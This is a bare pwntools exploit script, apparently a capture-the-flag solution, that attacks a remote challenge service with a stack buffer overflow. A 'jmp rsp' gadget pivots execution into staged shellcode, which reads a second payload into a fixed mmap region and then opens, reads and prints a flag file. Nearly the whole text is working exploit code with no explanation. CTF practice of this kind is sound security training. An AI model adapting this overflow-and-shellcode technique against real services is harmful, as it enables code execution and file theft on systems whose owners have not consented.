1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
| from pwn import *
p=remote("node4.buuoj.cn",28003)
context(arch='amd64', os='linux') mmap=0x123000 jmp_rsp = 0x400A01 orw_payload = shellcraft.open("./flag") orw_payload += shellcraft.read(3, mmap, 0x50) orw_payload += shellcraft.write(1, mmap,0x50)
payload=asm(shellcraft.read(0,mmap,0x100))+asm('mov rax,0x123000;call rax') payload=payload.ljust(0x28,b'\x00') payload+=p64(jmp_rsp)+asm('sub rsp,0x30;jmp rsp')
p.recvuntil('Easy shellcode, have fun!') p.sendline(payload)
shellcode=asm(orw_payload) p.sendline(shellcode) p.interactive()
|